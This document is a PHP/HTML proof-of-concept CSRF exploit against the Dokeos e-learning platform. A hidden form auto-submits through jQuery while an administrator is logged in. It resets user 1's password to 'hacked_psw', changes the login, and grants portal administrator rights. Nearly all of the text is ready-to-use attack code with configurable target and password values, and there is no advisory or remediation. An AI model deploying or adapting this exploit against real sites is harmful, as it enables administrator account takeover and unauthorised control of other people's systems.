<?php
// This exploit trigger a CSRF submission to the main site
// With the admin user logged in, attacker may change anyone's account
// information, including username and password

$hostname = "www.dokeos.com"; // change this to the hostname
$form_url = "https://".$hostname."/dokeos/main/admin/user_edit.php";
$new_password = "hacked_psw"; // change this to the new password
?>
<html>
  <head>
    <title>Thirdy Party CSRF Submission</title>
    <script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
    <script>
        $(document).ready(function() {
            $('#submit_btn').trigger('click');
        });
    </script>
    <!--
    -->
  </head>
  <body>
  <!-- <h1># You are hacked # Redirecting to the User Listing page</h1> -->
  <form style="width: 60%; float: left; display:none;" action="<?php echo $form_url ?>" method="post" name="user_add" id="user_add" enctype="multipart/form-data"> <div class="row"> <div class="label"> <span class="form_required">*</span> Last Name </div> <div class="formw"> <input name="lastname" type="text" value="Doe"> </div> </div> <div class="row"> <div class="label"> <span class="form_required">*</span> First Name </div> <div class="formw"> <input name="firstname" type="text" value="John"> </div> </div> <div class="row"> <div class="label">Official Code </div> <div class="formw"> <input size="40" name="official_code" type="text" value="ADMIN"> </div> </div> <div class="row"> <div class="label"> <span class="form_required">*</span> E-mail </div> <div class="formw"> <input size="40" name="email" type="text" value="webmaster@localhost.localdomain"> </div> </div> <div class="row"> <div class="label">Phone number </div> <div class="formw"> <input name="phone" type="text"> </div> </div> <div class="row"> <div class="label">Add a picture </div> <div class="formw"> <input name="picture" type="file"> </div> </div> <div class="row"> <div class="label"> <span class="form_required">*</span> Login </div> <div class="formw"> <input maxlength="20" name="username" type="text" value="student"> </div> </div> <div class="row"> <div class="label">password </div> <div class="formw"> <input name="reset_password" value="0" type="radio" id="qf_c2f4ec"><label for="qf_c2f4ec">Don't reset password</label> </div> </div> <div class="row"> <div class="label"> </div> <div class="formw"> <input name="reset_password" value="1" type="radio" id="qf_b93227"><label for="qf_b93227">Automattically generate a new password</label> </div> </div> <div class="row"> <div class="label"> </div> <div class="formw"> <input name="reset_password" value="2" type="radio" id="qf_5f6abd" checked><input name="password" type="password" value="<?php echo $new_password ?>"> </div> </div> <div class="row"> <div class="label">Status </div> <div class="formw"> <select name="status"> <option value="1" selected="selected">course manager</option> <option value="5">student</option> </select> </div> </div> <div class="row"> <div class="label">Portal Administration </div> <div class="formw"> <input name="platform_admin" value="1" type="radio" id="qf_7e38b3" checked="checked"><label for="qf_7e38b3">Yes</label>&nbsp;<input name="platform_admin" value="0" type="radio" id="qf_848c0e"><label for="qf_848c0e">No</label> </div> </div> <div class="row"> <div class="label">Send mail to new user </div> <div class="formw"> <input name="send_mail" value="1" type="radio" id="qf_330d5a"><label for="qf_330d5a">Yes</label>&nbsp;<input name="send_mail" value="0" type="radio" id="qf_881d69" checked="checked"><label for="qf_881d69">No</label> </div> </div> <div class="row"> <div class="label">Registration date </div> <div class="formw"> 2014-01-10 11:53:01 </div> </div> <div class="row"> <div class="label"> </div> <div class="formw"> <input name="submit" value="OK" type="submit" id="submit_btn"> </div> </div> <div class="row"> <div class="label"></div> <div class="formw"><span class="form_required">*</span> <small>required field</small></div> </div><input name="_qf__user_add" type="hidden" value=""> <input name="user_id" type="hidden" value="1"> <input name="MAX_FILE_SIZE" type="hidden" value="2097152"> <div class="clear"> &nbsp; </div> </form>
  </body>
</html>
